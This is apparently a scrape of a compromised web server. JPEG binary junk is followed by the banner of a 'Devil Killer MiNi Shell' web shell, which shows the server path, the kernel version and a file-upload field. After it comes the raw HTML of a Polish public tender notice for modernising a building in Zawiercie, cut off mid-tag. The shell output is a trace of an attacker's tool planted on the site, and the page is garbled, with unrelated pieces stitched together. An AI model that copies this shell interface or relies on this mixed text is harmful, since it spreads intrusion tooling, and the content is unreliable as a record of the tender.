JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220307/0007673601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Termomodernizacja budynku z przebudową przychodni przy ul. Niedziałkowskiego 15 w Zawierciu oraz zmiana sposobu użytkowania na pomieszczenia biurowo – administracyjne.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Zawierciański</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Starostwo Powiatowe w Zawierciu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 27625525200000</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sienkiewicza 34</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zawiercie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">324507100</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sod@zawiercie.powiat.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.zawiercie.powiat.finn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Termomodernizacja budynku z przebudową przychodni przy ul. Niedziałkowskiego 15 w Zawierciu oraz zmiana sposobu użytkowania na pomieszczenia biurowo – administracyjne.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e87c406e-9a2f-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00076736</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00001136/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.12 „Termomodernizacja z przebudową budynku przychodni przy ul. Niedziałkowskiego 15 w Zawierciu oraz zmiana sposobu użytkowania na pomieszczenia biurowo – administracyjne.”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie współfinansowane przez UE w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 20142020 Oś Priorytetowa IV Efektywność Energetyczna odnawialne Źródła Energii i Gospodarka Niskoemisyjna Poddziałanie 4.2.1 Efektywność Energetyczna i odnawialne Źródła Energii w Infrastrukturze publicznej i Mieszkaniowej ZIT </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/cuw_zawiercie <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/cuw_zawiercie</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w<br/>języku polskim w formie<br/>elektronicznej za pośrednictwem platformazakupowa.pl pod adresem https://platformazakupowa.pl/pn/cuw_zawiercie.<br/>2. Wymagane jest, aby komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia<br/>oraz informacje, przekazywane<br/>były za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. Za datę przekazania (wpływu)<br/>oświadczeń, wniosków, zawiadomień<br/>oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij<br/>wiadomość do zamawiającego” po<br/>których pojawi się komunikat, że wiadomość została wysłana do Zamawiającego. Zamawiający dopuszcza, opcjonalnie,<br/>komunikację za pośrednictwem poczty<br/>elektronicznej na adres sekretariat@cuw-zawiercie.pl<br/>3. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl.<br/>Informacje dotyczące odpowiedzi na<br/>pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji<br/>“Komunikaty”. Korespondencja, której<br/>zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za<br/>pośrednictwem platformazakupowa.pl<br/>do konkretnego Wykonawcy.<br/>4. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>platformazakupowa.pl przesłanych przez<br/>Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>5. Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub<br/>konkursie zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania<br/>czasu przekazania i odbioru danych<br/>za pośrednictwem platformazakupowa.pl, szczegółowo wymienione w rozdz. XI ust. 6 SWZ. Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275<br/>pkt 1 ustawy - Roboty budowlane<br/>6.Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin&#34; oraz<br/>uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków.<br/>7. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>platformazakupowa.pl, w szczególności za sytuację,<br/>gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij<br/>wiadomość do zamawiającego”). Taka<br/>oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu<br/>ponieważ nie został spełniony<br/>obowiązek narzucony w art. 221 Ustawy PZP.<br/>8. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ,<br/>składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w<br/>zakładce „Instrukcje dla<br/>Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>9. Oferta składana elektronicznie musi zostać podpisana elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub<br/>podpisem osobistym. W procesie<br/>składania oferty, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty Wykonawca składa bezpośrednio na<br/>dokumencie, który następnie<br/>przesyła do systemu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja RODO zawarta jest Rozdziale II w SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Nie przysługuje (Pani/Panu):<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>2. Skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego<br/>ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników;<br/>3. Na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO (Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SRZP261-0011/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest realizacja inwestycji w zakresie termomodernizacji z przebudową budynku przychodni przy<br/>ul. Niedziałkowskiego 15 w Zawierciu oraz zmiany sposobu użytkowania na pomieszczenia biurowo – administracyjne.<br/>współfinansowanego przez UE w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 20142020 Oś Priorytetowa IV Efektywność Energetyczna odnawialne Źródła Energii i Gospodarka Niskoemisyjna Poddziałanie 4.2.1<br/>Efektywność Energetyczna i odnawialne Źródła Energii w Infrastrukturze publicznej i Mieszkaniowej ZIT w zakresie Etapu I<br/>oraz współfinansowanego ze środków Funduszu Przeciwdziałania COVID-19 dla jednostek samorządu terytorialnego w<br/>ramach Rządowego Fundusz Inwestycji Lokalnych w zakresie Etapu II. Inwestycja obejmuje roboty budowlane związane z<br/>termomodernizacją budynku dawnej przychodni lekarskiej zlokalizowanej przy ul. Niedziałkowskiego 15 w Zawierciu oraz<br/>roboty budowlane związane ze zmianą sposobu użytkowania i przystosowania budynku do pełnienia funkcji biurowych i<br/>administracyjnych wraz z wyposażeniem dla Wydziału Komunikacji w Zawierciu. Inwestycja została oddzielnie<br/>zaprojektowana do realizacji w dwóch etapach.<br/>1) ETAP I – obejmuje wykonanie robót budowlanych na podstawie dokumentacji projektowej to jest: projektów budowlanych<br/>i wykonawczych oraz specyfikacji technicznych wykonania i odbioru robót, w skrócie STWIORB. Dokumentacja projektowa<br/>zawarta została w załączonym do SWZ Folderze o nazwie „Dokumentacja projektowa ETAP I” i stanowi szczegółowy opis<br/>przedmiotu zamówienia objętego Etapem I.<br/>2) Etap II obejmuje wykonanie robót budowlanych na podstawie dokumentacji projektowej to jest: projektów budowlanych i<br/>wykonawczych oraz specyfikacji technicznych wykonania i odbioru robót, w skrócie STWIORB. Dokumentacja projektowa<br/>zawarta została w załączonym do SWZ Folderze o nazwie „Dokumentacja projektowa ETAP II” i stanowi szczegółowy opis<br/>przedmiotu zamówienia objętego Etapem II.<br/>2. Ubezpieczenie - Wykonawca w okresie realizacji przedmiotu zamówienia (od dnia podpisania umowy do dnia odbioru<br/>końcowego) musi posiadać aktualne ubezpieczenie od odpowiedzialności cywilnej (OC) za wyrządzone szkody materialne<br/>(mienie osób trzecich i mienie powierzone) powstałe w związku z realizacją przedmiotu zamówienia i na sumę gwarancyjną<br/>nie mniejszą niż wartość przyszłej umowy wyrażoną w PLN lub dla walut obcych w wysokości równoważnej, przeliczonej<br/>według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP na ostatni dzień roboczy<br/>poprzedzający dzień zawarcia umowy. Wykonawca utrzyma ważność ubezpieczenia przez cały okres realizacji przedmiotu<br/>zamówienia.<br/>3. Rozwiązania równoważne - Zamawiający informuje, iż zgodnie z art. 101 ust. 4 Pzp, jeżeli w opisie przedmiotu<br/>zamówienia zawartym w Dokumentacji projektowej, STWIORB lub Przedmiarach znajdzie się odniesienie do norm, ocen<br/>technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust.<br/>3, Zamawiający dopuszcza rozwiązania równoważne opisywanym, to jest rozwiązania, które w stopniu równoważnym<br/>spełniają wymagania określone w opisie przedmiotu zamówienia.<br/>4. Zamawiający nie dopuszcza składania ofert częściowych. Zamówienie nie zostało podzielone na części ponieważ<br/>przedmiot zamówienia obejmuje wykonywanie robót budowlanych na jednym obiekcie. Zamawiający nie dopuszcza<br/>składania ofert częściowych, gdyż taki podział groziłby w opinii Zamawiającego nadmiernymi trudnościami technicznymi<br/>oraz organizacyjnymi w realizacji zamówienia – potrzeba skoordynowania działań różnych Wykonawców realizujących<br/>poszczególne części zamówienia, tj. wydanie placu budowy więcej niż jednemu podmiotowi, prowadzenie robót równolegle<br/>mogłoby poważnie zagrozić jego właściwemu wykonaniu. Brak podziału na części nie ogranicza konkurencji, gdyż dostęp do<br/>realizacji zamówienia ma większość podmiotów MŚP funkcjonujących na rynku.<br/>5. Zamawiający nie przewiduje udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 Pzp.<br/>6. Szczegółowy opis przedmiotu zamówienia oraz sposób jego realizacji zawiera dokumentacja projektowa, STWIORB oraz<br/>Załącznik nr 7 do SWZ Projektowane postanowienia przyszłej umowy.<br/>7. Wykonawca zobowiązany jest do udzielenia 60 miesięcznego okresu gwarancji na wykonany przedmiot zamówienia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">42511110-5 - Pompy grzewcze</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45223100-7 - Montaż konstrukcji metalowych</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45314000-1 - Instalowanie urządzeń telekomunikacyjnych</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45421150-0 - Instalowanie stolarki niemetalowej</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami<br/>oceny ofert:<br/>1) Cena (C) – waga kryterium 60 %;<br/>2) Kryterium jakościowe odnoszące się do doświadczenia osób skierowanych do realizacji zamówienia w tym:<br/>a) Doświadczenie Kierownika budowy – waga kryterium 40 %.<br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C) – waga 60 %<br/>Podstawą przyznania punktów w kryterium „Cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>cena najniższa brutto*<br/>C = ------------------------------------------------ x (100 pkt x 60 %)<br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>2) Doświadczenie Kierownika budowy – waga 40 %<br/>Za wykazanie przez skierowanego do realizacji zamówienia Kierownika budowy nadzorowania lub kierowania robotami budowlanymi<br/>w zakresie budowy, rozbudowy lub przebudowy kubaturowego obiektu budowlanego obejmującej jego termomodernizację<br/>(nadzorowane roboty w charakterze kierownika budowy, kierownika robót lub inspektora nadzoru inwestorskiego), wykonawca<br/>uzyska odpowiednią liczbę punktów obliczoną wg poniższego wzoru. Ocenie podlega maksymalnie pięć (5) nadzorowanych robót.<br/>Liczba nadzorowanych robót w ofercie badanej<br/>DK = --------------------------------------------------------------------------------------- x (100 pkt x 40 %)<br/>Największa liczba nadzorowanych robót wskazana w ofercie*<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>3) Punktacja łączna<br/>P = C+DK<br/>Gdzie P – punktacja łączna<br/>C – liczba punktów przyznana w Kryterium Cena<br/>DK – liczba punktów przyznana w Kryterium Doświadczenie Kierownika Budowy<br/>4) Punktacja ostateczna danej oferty w porównaniu z ofertą, która uzyskała najwyższą liczbę punktów<br/>PN<br/>PO = ------------------ x (100 pkt. X 100%)<br/>PB<br/>Gdzie PO – punktacja ostateczna<br/>PN – Najwyższa liczba punktów przyznana ofercie, spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>PB – Liczba punktów przyznana ofercie badanej<br/>3. Punktacja ostateczna przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, bez stosowania<br/>zaokrągleń (trzecia cyfra po przecinku nie będzie brana pod uwagę i nie będzie miała wpływu na wynik)<br/>4. Oferta, która w punktacji ostatecznej uzyska maksymalna liczbę 100 pkt. zostanie uznana za najkorzystniejszą.<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium „cena ofertowa”.<br/>6. Jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w<br/>terminie przez siebie określonym ofert dodatkowych zawierających nową cenę, przy czym Wykonawcy, składając oferty dodatkowe,<br/>nie mogą zaoferować cen lub kosztów wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>7. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym<br/>zaoferowanej ceny.<br/>8. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span 